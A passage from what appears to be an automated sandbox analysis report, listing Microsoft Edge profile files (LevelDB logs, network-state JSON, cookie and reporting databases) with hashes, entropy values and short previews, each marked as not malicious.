                                                                                                                                                                                                                                                                  SHA1:215E33B57374B5ACE17054EE543259F081E98146
                                                                                                                                                                                                                                                                  SHA-256:C75B3BBBA8D4E2D44107843D422CB64BA337C0444236298F2F4B5CA323BF1720
                                                                                                                                                                                                                                                                  SHA-512:D701741A158147D61C06A1756740B3E3EC6B5D7D30CFBC747F661179DDB802C579F2936CC2A111CB280A74365CE42854F6D80D054EB3EA521A1B73BC820D8A14
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:2024/12/19-07:44:23.166 1d10 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/MANIFEST-000001.2024/12/19-07:44:23.167 1d10 Recovering log #3.2024/12/19-07:44:23.167 1d10 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/000003.log .

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\LOG

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):336
                                                                                                                                                                                                                                                                  Entropy (8bit):5.160537795929802
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:6:7oEFIq2P923oH+Tcwt8a2jMGIFUt8OoN09Zmw+OofkwO923oH+Tcwt8a2jMmLJ:72v4Yeb8EFUt8O79/+O+5LYeb8bJ
                                                                                                                                                                                                                                                                  MD5:2E12085E6D70767722E7F8A3B49F3EE6
                                                                                                                                                                                                                                                                  SHA1:EA7A7E9072CB9E14D204BA4F99AE428B45CF8E55
                                                                                                                                                                                                                                                                  SHA-256:A91AC32EBA6E1945CBCCF512BDAC130E1E42536B92FC55500B371F9FC8FF18B8
                                                                                                                                                                                                                                                                  SHA-512:F18AB058C2F349FF1A95B280D960E5EEDE62B65B8A5366CA9D051185491155C1A880A3769F7D6624FC91E35AEBB7921A42C3AF9973A8EA0CEEEFE2F4FD5CDA1C
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:2024/12/19-07:44:19.786 1e44 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/MANIFEST-000001.2024/12/19-07:44:19.788 1e44 Recovering log #3.2024/12/19-07:44:19.792 1e44 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/000003.log .

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\LOG.old (copy)

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):336
                                                                                                                                                                                                                                                                  Entropy (8bit):5.160537795929802
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:6:7oEFIq2P923oH+Tcwt8a2jMGIFUt8OoN09Zmw+OofkwO923oH+Tcwt8a2jMmLJ:72v4Yeb8EFUt8O79/+O+5LYeb8bJ
                                                                                                                                                                                                                                                                  MD5:2E12085E6D70767722E7F8A3B49F3EE6
                                                                                                                                                                                                                                                                  SHA1:EA7A7E9072CB9E14D204BA4F99AE428B45CF8E55
                                                                                                                                                                                                                                                                  SHA-256:A91AC32EBA6E1945CBCCF512BDAC130E1E42536B92FC55500B371F9FC8FF18B8
                                                                                                                                                                                                                                                                  SHA-512:F18AB058C2F349FF1A95B280D960E5EEDE62B65B8A5366CA9D051185491155C1A880A3769F7D6624FC91E35AEBB7921A42C3AF9973A8EA0CEEEFE2F4FD5CDA1C
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:2024/12/19-07:44:19.786 1e44 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/MANIFEST-000001.2024/12/19-07:44:19.788 1e44 Recovering log #3.2024/12/19-07:44:19.792 1e44 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/000003.log .

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\08de361d-b4cc-4405-8ee3-2169f61947c9.tmp

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):2
                                                                                                                                                                                                                                                                  Entropy (8bit):1.0
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:3:H:H
                                                                                                                                                                                                                                                                  MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                  SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                  SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                  SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:[]

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\0fdeaf9f-fa9d-4743-9293-657c85eb562d.tmp

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):2
                                                                                                                                                                                                                                                                  Entropy (8bit):1.0
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:3:H:H
                                                                                                                                                                                                                                                                  MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                  SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                  SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                  SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:[]

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\3890c529-fd00-41ce-828f-d1f5d884ddcd.tmp

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):1630
                                                                                                                                                                                                                                                                  Entropy (8bit):5.341661514774242
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:24:YcFGJ/I3RdstQZVMdmRdsngZFRudFGRw6C1VdsUyZCO4iYls+Z6ma3yeesw6maPJ:YcgCzsKtsgfc7RshC5s6leeBkhYhbx9+
                                                                                                                                                                                                                                                                  MD5:DB3084DB92527747F188C84A95A251CA
                                                                                                                                                                                                                                                                  SHA1:DAD3CA8818EF2FCB05C0DD8F84A02BBCBE0C06AB
                                                                                                                                                                                                                                                                  SHA-256:51988DBE4AEBEF35DBF2CC96AA4C9C2D6069C7E588B790276853480B04159ACF
                                                                                                                                                                                                                                                                  SHA-512:CACE97D0575F7CF1FD5231C547243B2B82F54676582AB2F86BA735A04E8B381394A4D82E251082E7D24DF104188730DF25527294320289FDF61C03211739F6E4
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:{"net":{"http_server_properties":{"servers":[{"anonymization":["IAAAABoAAABodHRwczovL3d3dy5nb29nbGVhcGlzLmNvbQAA",false],"server":"https://www.googleapis.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13381677863193170","port":443,"protocol_str":"quic"}],"anonymization":["GAAAABIAAABodHRwczovL2dvb2dsZS5jb20AAA==",false],"server":"https://clients2.google.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13381677866083809","port":443,"protocol_str":"quic"}],"anonymization":["JAAAAB0AAABodHRwczovL2dvb2dsZXVzZXJjb250ZW50LmNvbQAAAA==",false],"server":"https://clients2.googleusercontent.com","supports_spdy":true},{"anonymization":["HAAAABUAAABodHRwczovL2F6dXJlZWRnZS5uZXQAAAA=",false],"server":"https://edgeassetservice.azureedge.net","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13379179474458946","port":443,"protocol_str":"quic"}],"anonymization":["FAAAABAAAABodHRwc

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\896ed003-c77e-49b8-8a30-26355e24a0c1.tmp

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):40
                                                                                                                                                                                                                                                                  Entropy (8bit):4.1275671571169275
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
                                                                                                                                                                                                                                                                  MD5:20D4B8FA017A12A108C87F540836E250
                                                                                                                                                                                                                                                                  SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
                                                                                                                                                                                                                                                                  SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                                                                                                                                                                                                                                                  SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:{"SDCH":{"dictionaries":{},"version":2}}

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 8, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 8
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):20480
                                                                                                                                                                                                                                                                  Entropy (8bit):1.1352478996107633
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:48:TsKLopF+SawLUO1Xj8BWoarblHJJpse7VoXIUxdXGTOeJXeN5VGL:te+AuZavjYMOs
                                                                                                                                                                                                                                                                  MD5:122F2115C0C768BDE48983DAE387D27E
                                                                                                                                                                                                                                                                  SHA1:9C028C11B3C20CFCFF0E5701D91366EB9D38D70C
                                                                                                                                                                                                                                                                  SHA-256:61FD37B5E988967216D5F2B9F878B5A0A85FBF4CE3198B86BF60C72590474071
                                                                                                                                                                                                                                                                  SHA-512:92ACD9D2B4A86A69FDDF77715279037703D55EEAD873F49DF36487306340C19579495E6E301715E9D3F93B33B241E856E87D8E3FA5BB2A18A5A5D96097ECB71B
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Network Persistent State (copy)

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):1419
                                                                                                                                                                                                                                                                  Entropy (8bit):5.336110615415376
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:24:YXsJZVMdmRdsBjZFRudFGRw6ma3yeesRds1yZFGJ/I3w6C1E6maPsQYhbxP7np+:YXs/tsbfc7leeEscgCgakhYhbx9+
                                                                                                                                                                                                                                                                  MD5:7D870539B6C4EE40FA5CFD87A3D4BFEC
                                                                                                                                                                                                                                                                  SHA1:F45BE07A3A05615856688219AFE6713EBABBAC2C
                                                                                                                                                                                                                                                                  SHA-256:73513F7A38830E47624257EF04A4F73BF174FD1FEBAC172AA416BF6470930F90
                                                                                                                                                                                                                                                                  SHA-512:90EABCE74F8CBB5FF1F96566E1293887BB3DB36C9E32F6C619D1EC7C9AAE504221CDEC2DD1468915A0A06A65E472C5446731838C89E665EBD9FA114F12261327
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:{"net":{"http_server_properties":{"servers":[{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343492604479295","port":443,"protocol_str":"quic"}],"anonymization":["GAAAABIAAABodHRwczovL2dvb2dsZS5jb20AAA==",false],"server":"https://clients2.google.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343492605127283","port":443,"protocol_str":"quic"}],"anonymization":["JAAAAB0AAABodHRwczovL2dvb2dsZXVzZXJjb250ZW50LmNvbQAAAA==",false],"server":"https://clients2.googleusercontent.com","supports_spdy":true},{"anonymization":["HAAAABUAAABodHRwczovL21pY3Jvc29mdC5jb20AAAA=",false],"server":"https://msedgeextensions.sf.tlu.dl.delivery.mp.microsoft.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343492606741506","port":443,"protocol_str":"quic"}],"anonymization":["IAAAABoAAABodHRwczovL3d3dy5nb29nbGVhcGlzLmNvbQAA",false],"server":"https://www.googleapis.com","supports_spdy":true},{"anonymizatio

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Network Persistent State~RF49372.TMP (copy)

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):1419
                                                                                                                                                                                                                                                                  Entropy (8bit):5.336110615415376
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:24:YXsJZVMdmRdsBjZFRudFGRw6ma3yeesRds1yZFGJ/I3w6C1E6maPsQYhbxP7np+:YXs/tsbfc7leeEscgCgakhYhbx9+
                                                                                                                                                                                                                                                                  MD5:7D870539B6C4EE40FA5CFD87A3D4BFEC
                                                                                                                                                                                                                                                                  SHA1:F45BE07A3A05615856688219AFE6713EBABBAC2C
                                                                                                                                                                                                                                                                  SHA-256:73513F7A38830E47624257EF04A4F73BF174FD1FEBAC172AA416BF6470930F90
                                                                                                                                                                                                                                                                  SHA-512:90EABCE74F8CBB5FF1F96566E1293887BB3DB36C9E32F6C619D1EC7C9AAE504221CDEC2DD1468915A0A06A65E472C5446731838C89E665EBD9FA114F12261327
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:{"net":{"http_server_properties":{"servers":[{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343492604479295","port":443,"protocol_str":"quic"}],"anonymization":["GAAAABIAAABodHRwczovL2dvb2dsZS5jb20AAA==",false],"server":"https://clients2.google.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343492605127283","port":443,"protocol_str":"quic"}],"anonymization":["JAAAAB0AAABodHRwczovL2dvb2dsZXVzZXJjb250ZW50LmNvbQAAAA==",false],"server":"https://clients2.googleusercontent.com","supports_spdy":true},{"anonymization":["HAAAABUAAABodHRwczovL21pY3Jvc29mdC5jb20AAAA=",false],"server":"https://msedgeextensions.sf.tlu.dl.delivery.mp.microsoft.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343492606741506","port":443,"protocol_str":"quic"}],"anonymization":["IAAAABoAAABodHRwczovL3d3dy5nb29nbGVhcGlzLmNvbQAA",false],"server":"https://www.googleapis.com","supports_spdy":true},{"anonymizatio

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Reporting and NEL

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 9, cookie 0x4, schema 4, UTF-8, version-valid-for 6
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):36864
                                                                                                                                                                                                                                                                  Entropy (8bit):0.760320027168229
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:48:TaIopKWurJNVr1GJmA8pv82pfurJNVrdHXuccaurJN2VrJ1n4n1GmzNGU1cSBk34:uIEumQv8m1ccnvS6x
                                                                                                                                                                                                                                                                  MD5:01C3EB685247F548744F3694591ABCDD
                                                                                                                                                                                                                                                                  SHA1:4B0D52192BA836A032707A999D89AA3862BAFA15
                                                                                                                                                                                                                                                                  SHA-256:4560D0502D851F9EE53E2930713D12DCA027FC9B3E5ADD70603AB050FC509901
                                                                                                                                                                                                                                                                  SHA-512:0A796637B437ACC466F7BE1768A6D376875963C7EBC83BB85671A79C61CBBBE11D1122D3A2DECD352B19B759ACFA31FA78781920FD9AC47113FE5D92072324CC
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j..........g...D.........7............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\SCT Auditing Pending Reports (copy)

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):2
                                                                                                                                                                                                                                                                  Entropy (8bit):1.0
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:3:H:H
                                                                                                                                                                                                                                                                  MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                  SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                  SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                  SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:[]

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\SCT Auditing Pending Reports~RF38a9d.TMP (copy)

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):2
                                                                                                                                                                                                                                                                  Entropy (8bit):1.0
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:3:H:H
                                                                                                                                                                                                                                                                  MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                  SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                  SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                  SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:[]

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\SCT Auditing Pending Reports~RF394fe.TMP (copy)

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):2
                                                                                                                                                                                                                                                                  Entropy (8bit):1.0
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:3:H:H
                                                                                                                                                                                                                                                                  MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                  SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                  SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                  SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:[]

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Sdch Dictionaries (copy)

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):40
                                                                                                                                                                                                                                                                  Entropy (8bit):4.1275671571169275
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
                                                                                                                                                                                                                                                                  MD5:20D4B8FA017A12A108C87F540836E250
                                                                                                                                                                                                                                                                  SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
                                                                                                                                                                                                                                                                  SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                                                                                                                                                                                                                                                  SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:{"SDCH":{"dictionaries":{},"version":2}}

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\d2cb88f8-ccdb-4dc7-bc9c-380652edb80c.tmp

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):1419
                                                                                                                                                                                                                                                                  Entropy (8bit):5.336110615415376
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:24:YXsJZVMdmRdsBjZFRudFGRw6ma3yeesRds1yZFGJ/I3w6C1E6maPsQYhbxP7np+:YXs/tsbfc7leeEscgCgakhYhbx9+
                                                                                                                                                                                                                                                                  MD5:7D870539B6C4EE40FA5CFD87A3D4BFEC
                                                                                                                                                                                                                                                                  SHA1:F45BE07A3A05615856688219AFE6713EBABBAC2C
                                                                                                                                                                                                                                                                  SHA-256:73513F7A38830E47624257EF04A4F73BF174FD1FEBAC172AA416BF6470930F90
                                                                                                                                                                                                                                                                  SHA-512:90EABCE74F8CBB5FF1F96566E1293887BB3DB36C9E32F6C619D1EC7C9AAE504221CDEC2DD1468915A0A06A65E472C5446731838C89E665EBD9FA114F12261327
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:{"net":{"http_server_properties":{"servers":[{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343492604479295","port":443,"protocol_str":"quic"}],"anonymization":["GAAAABIAAABodHRwczovL2dvb2dsZS5jb20AAA==",false],"server":"https://clients2.google.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343492605127283","port":443,"protocol_str":"quic"}],"anonymization":["JAAAAB0AAABodHRwczovL2dvb2dsZXVzZXJjb250ZW50LmNvbQAAAA==",false],"server":"https://clients2.googleusercontent.com","supports_spdy":true},{"anonymization":["HAAAABUAAABodHRwczovL21pY3Jvc29mdC5jb20AAAA=",false],"server":"https://msedgeextensions.sf.tlu.dl.delivery.mp.microsoft.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343492606741506","port":443,"protocol_str":"quic"}],"anonymization":["IAAAABoAAABodHRwczovL3d3dy5nb29nbGVhcGlzLmNvbQAA",false],"server":"https://www.googleapis.com","supports_spdy":true},{"anonymizatio

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\e248ce5e-e85f-4175-9a71-410a88be9e14.tmp

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):2
                                                                                                                                                                                                                                                                  Entropy (8bit):1.0
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:3:H:H
                                                                                                                                                                                                                                                                  MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                  SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                  SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                  SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:[]

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Nurturing\campaign_history

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):20480
                                                                                                                                                                                                                                                                  Entropy (8bit):0.6949007314891732
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:12:TLSnAFUxOUDaabZXiDiIF8izX4fhhdWeci2oesJaYi3isal/d0dtdjiG1dMgrfNr:TLSOUOq0afDdWec9sJrl7ZWI7J5fc
                                                                                                                                                                                                                                                                  MD5:52DE909D04514C10D7428B67A26BBDAC
                                                                                                                                                                                                                                                                  SHA1:0371737559133042EBF793502ECDC403011376E4
                                                                                                                                                                                                                                                                  SHA-256:B05BF68A882F04103FA0F53A61974AFB591B09010DDBD5139B67B9ECE073F388
                                                                                                                                                                                                                                                                  SHA-512:A1A861BBE3D275229BD39E11A72D894D9838145876FB40D1E233D1637F26BD5C13FBCF329D7984E0F89C3D69D1177E0E852C47B2404AC4A161101EA6ED0C7DE0
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Pdf\pdfSQLite

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
